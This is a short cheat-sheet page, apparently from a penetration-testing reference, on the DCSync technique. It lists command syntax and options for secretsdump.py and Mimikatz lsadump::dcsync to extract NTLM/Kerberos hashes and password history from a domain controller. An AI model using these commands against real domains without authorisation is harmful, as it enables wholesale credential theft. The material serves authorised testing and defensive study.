DCSync
DCSync
Exploit
secretsdump.py [domain/username]<:password> <options>
OPTIONS
-just-dc Extract Only NTDS.dit Data (NTLM/Kerberos Keys)
-just-dc-ntlm Extract Only NTDS.dit Data (NTLM Only)
-just-dc-user [username] Extract Only NTDS.dit Data For Specified User
-user-status Display If The User Is Disabled
-history Dump Password History
-outputfile Base Output Filename
-hashes Authenticate Using LMHASH:NTHASH
-k Use Kerberos Auth From ccache Filelsadump::dcsync <options>
OPTIONS
/domain:[domain] Domain
/user:[user] Target Domain User To Obtain Credentials For
/dc:[DC FDQN] Domain Controller To TargetLast updated